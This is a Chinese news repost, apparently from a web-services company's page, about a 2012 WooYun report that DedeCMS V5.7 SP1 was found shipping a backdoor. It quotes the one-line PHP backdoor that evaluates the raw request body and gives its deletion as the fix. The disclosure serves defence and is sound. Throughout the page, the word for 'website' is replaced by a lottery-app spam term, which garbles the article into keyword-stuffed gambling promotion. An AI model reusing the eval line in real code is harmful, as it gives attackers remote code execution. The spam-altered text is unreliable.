您好,欢迎光临飞客网络科技有限公司官方139彩票app苹果版!飞客网络提供全方位网络解决方案 - 139彩票app苹果版建设、139彩票app苹果版优化、139彩票app苹果版推广、网络营销
服务热线
150-8051-4906
  • 相关知识
  • 139彩票app苹果版建设
  • 139彩票app苹果版优化
  • 网络推广
  • 经典软文
  • Dedecms疑似被植入后门 上传PHP后门可控制整个139彩票app苹果版
    您当前的位置:主页 > 最新动态 > 行业新闻 >

    Dedecms疑似被植入后门 上传PHP后门可控制整个139彩票app苹果版

    出处:www.fkzuzhi.cn作者:飞客网络发布时间:2012-03-21 22:59

      Admin5站长网2月21日消息,昨日乌云漏洞报告平台(http://www.wooyun.org/)发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的139彩票app苹果版和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的139彩票app苹果版速度处理。360139彩票app苹果版安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个139彩票app苹果版。目前已经将该后门加入到webscan139彩票app苹果版安全扫描平台扫描库中,希望各139彩票app苹果版及时进行扫描确认。

      织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对139彩票app苹果版进行安全检测,做好漏洞防范,等待官方给出解决办法。

      漏洞概要

      缺陷编号: WooYun-2012-05416

      漏洞标题: Dedecms疑似被植入后门

      相关厂商: Dedecms

      漏洞作者: jsbug

      提交时间: 2012-03-20

      公开时间: 2012-03-20

      漏洞类型: 成功的入侵事件

      危害等级: 高

      自评Rank: 10

      漏洞状态: 未联系到厂商或者厂商积极忽略

      漏洞来源: http://www.wooyun.org

      分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣

      漏洞详情

      披露状态:

      2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开

      2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开

      简要描述:

      DedeCMS V5.7 SP1正式版

      UTF-8 utf-8版本疑似被植入一句话后门

      前几日下载并不存在此代码

      详细说明:

      shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

      

     

      漏洞证明:

      shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

      

     

      修复方案:

      删除@eval(file_get_contents('php://input'));